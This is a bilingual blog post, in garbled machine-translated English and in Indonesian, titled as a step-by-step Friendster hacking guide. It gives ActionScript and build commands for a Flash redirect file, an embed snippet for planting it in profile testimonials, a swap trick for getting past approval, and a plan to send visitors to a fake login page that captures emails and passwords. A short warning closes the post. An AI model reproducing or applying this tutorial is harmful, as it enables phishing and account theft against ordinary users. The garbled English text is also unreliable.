FRIENDSTER HACKING STEP BY STEP

By: http://atlantisnetwork.blogspot.com

Do you have an account and often visit Friendster? If yes so be careful from now.
Friendster is a social networking site services which has a very large number of members
in the world.
However, if you yearn for this site has the grip of security that can be used by hackers to
steal your account? The following article will explain how a hacker using engineering
techniques to steal username and password Friendster, which I quoted from the blog
chaidir.wordpress.com.

Techniques used to redirect a profile of Friendster is using a flash. Now I want to give me
an example of how we redirect Friendster profile URL to someone who we want. First we
create a simple script, such as flash code below. To use Linux, install the Ming package
first. Ming is a library that can generate the Macromedia Flash file (. Swf). If you use
Ubuntu and not to install, run the following command:

apt-get install libming-util

If Ming successfully installed, create a file with your editor, which contains the following
code and save with the name flash.as:

etURL ( "http://www.example.com");

for instance as follows:

getURL ( "http://chaidir.wordpress.com");

After a flash file (. Swf) by running the following command:

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

If successful, it will produce a file called Flash out.swf. This file when accessed from the
browser will redirect me to a URL that we defined previously. For example, please access
the flash that I have made here. When you access the url, then you direct 'directed'
towards http://chaidir.wordpress.com.

Then, upload the files was a flash (out.swf) to a place that is easily accessible. For
example, in http://numpang.com/out.swf. After that, send a testimonial to the people who
want to give testimonials in the flash file with this.

And then enter the following code:

<object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′
codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swfla
sh.cab#version=6,0,29,0′ width=’400′ height=’250′><param name=’movie’
value=’http://numpang.com/out.swf‘ /><param name=’quality’ value=’high’
/><embed src=’http://numpang.com/out.swf‘ quality=’high’
pluginspage=’http://www.macromedia.com/go/getflashplayer’
type=’application/x-shockwave-flash’ width=’400′ height=’250′
allowScriptAccess=”never”></embed></object>

To try if this successfully testimonials, click preview. So that the recipient can receive
testimonials, delete the file and replace the flash (http://numpang.com/out.swf) with a
flash animation that attract attention. For example, with a flash of Babaflash Forum. After
the new Constitution, replace and switch again (upload again) with a flash file.

Now, in the example of Friendster in false cases, the cracker redirect every user who
wants to see the profile that was already get flash and direct to
http://www.friendster.co.nr. Pick to win there and created a page that resembles the login
page and Friendster seems to happen every error that requires the user to enter email and
password.

Facilities to submit a testimonial on Friendster cracker is used to deceptive people who

often play with Friendster. Therefore, be careful of testimonials that use flash. If
testimonail get from people who are not known or even a flash that important, better not
to open it.

Photo credit: thor.info

Bahasa
Apakah kamu punya account dan sering mengunjungi Friendster? Jika ya maka berhati-
hatilah mulai dari sekarang. Friendster merupakan situs layanan jejaring sosial (social
networking) yang mempunyai jumlah anggota sangat besar termasuk di Indonesia.
Indonesia menempati posisi ke-3 setelah Filipina dan Malaysia. Dengan member yang
sangat besar ini pihak Friendster pun meluncurkan situsnya dalam Bahasa Indonesia. Hal
ini sungguh menggembirakan bagi para pengguna Friendster di Indonesia.
Namun tahukah kamu jika situs ini mempunyai celah keamanan yang dapat digunakan
oleh para hacker untuk mencuri account kamu? Berikut artikel bagaimana seorang hacker
menggunakan teknik rekayasa untuk mencuri username dan password pengguna
Friendster yang saya kutip dari blog chaidir.wordpress.com.

Teknik yang digunakan untuk me-redirect suatu profile dari Friendster adalah dengan
menggunakan flash. Sekarang saya ingin memberikan contoh bagaimana kita me-redirect
profile Friendster seseorang menuju URL yang kita inginkan. Pertama kita buat script
flash sederhana seperti kode dibawah ini. Untuk yang menggunakan linux, install Ming
package terlebih dahulu. Ming adalah library yang dapat menghasilkan file Macromedia
Flash (.swf). Jika anda menggunakan ubuntu dan belum menginstall, jalankan perintah
berikut :

apt-get install libming-util

Jika Ming berhasil diinstal, buat sebuah file dengan editor anda yang berisi kode berikut
dan simpan dengan nama flash.as :

getURL("http://www.contoh.com");

misalkan seperti berikut :

getURL("http://chaidir.wordpress.com");

Setelah itu buat file flash (.swf) dengan menjalankan perintah berikut :

chaidir@osxbuntu:~$ /usr/lib/libming/bin/makeswf flash.as

Jika berhasil, maka akan dihasilkan file Flash bernama out.swf. File ini ketika diakses
dari browser, akan me-redirect ke URL yang kita definisikan sebelumnya. Contohnya
silahkan akses flash yang telah saya buat disini. Apabila anda mengakses url tersebut,
maka anda langsung ‘diarahkan’ menuju http://chaidir.wordpress.com.

Selanjutnya upload file flash tadi (out.swf) ke tempat yang mudah diakses. Misalkan di
http://numpang.com/out.swf. Setelah itu, kirim testimonial ke orang yang ingin di berikan
testimonial dengan memasukkan file flash ini.

Caranya masukkan kode berikut :

<object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′
codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swfla
sh.cab#version=6,0,29,0′ width=’400′ height=’250′><param name=’movie’
value=’http://numpang.com/out.swf‘ /><param name=’quality’ value=’high’
/><embed src=’http://numpang.com/out.swf‘ quality=’high’
pluginspage=’http://www.macromedia.com/go/getflashplayer’
type=’application/x-shockwave-flash’ width=’400′ height=’250′
allowScriptAccess=”never”></embed></object>

Untuk mencoba apakah testimonial ini berhasil, klik priview. Agar sang penerima
testimonial bisa meng-approve testimonial, hapus ganti file flash tadi terlebih dahulu
(http://numpang.com/out.swf) dengan flash animasi yang menarik perhatian. Misalnya
dengan flash dari Babaflash Forum. Baru setelah di approve, aktifkan ganti lagi (upload
lagi) dengan file flash tadi.

Nah, dalam contoh kasus di Friendster palsu, sang cracker me-redirect setiap user yang
ingin melihat profile yang sudah disusupi flash tadi dan mengarahkannya ke
http://www.friendster.co.nr. Dan celakanya disitu dibuat halaman yang menyerupai
halaman login Friendster dan seolah-olah terjadi kesalahan yang mengharuskan setiap
user memasukkan email dan passwordnya.

Fasilitas untuk mengirimkan testimonial di Friendster inilah yang dimanfaatkan cracker

untuk ‘mengelabuhi’ orang-orang yang sering bermain-main dengan Friendster. Oleh
karena itu, berhati-hatilah terhadap testimonial yang menggunakan flash. Jika
mendapatkan testimonail dari orang yang tidak dikenal (emang bisa ya?) atau flash yang
ngga penting, lebih baik tidak usah di approve aja.

Kredit foto: thor.info

Baca juga:

• Mencegah Friendster Hacking

• Hati-hati Menggunakan Komputer Kerja di Kantor
• Membuka Situs yang Diblokir